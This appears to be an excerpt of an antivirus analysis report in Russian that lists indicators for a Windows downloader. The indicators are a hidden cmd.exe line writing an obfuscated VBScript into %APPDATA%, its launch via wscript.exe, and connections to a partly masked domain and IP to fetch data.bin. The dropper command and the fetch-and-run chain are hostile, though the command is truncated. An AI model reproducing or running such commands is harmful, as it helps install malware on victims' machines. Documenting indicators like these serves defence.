Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N,P3wS" "IUpk=87" "dO wh...
- %APPDATA%\16897.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\16897.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N,P3wS" "IUpk=87" "dO wh...' (со скрытым окном)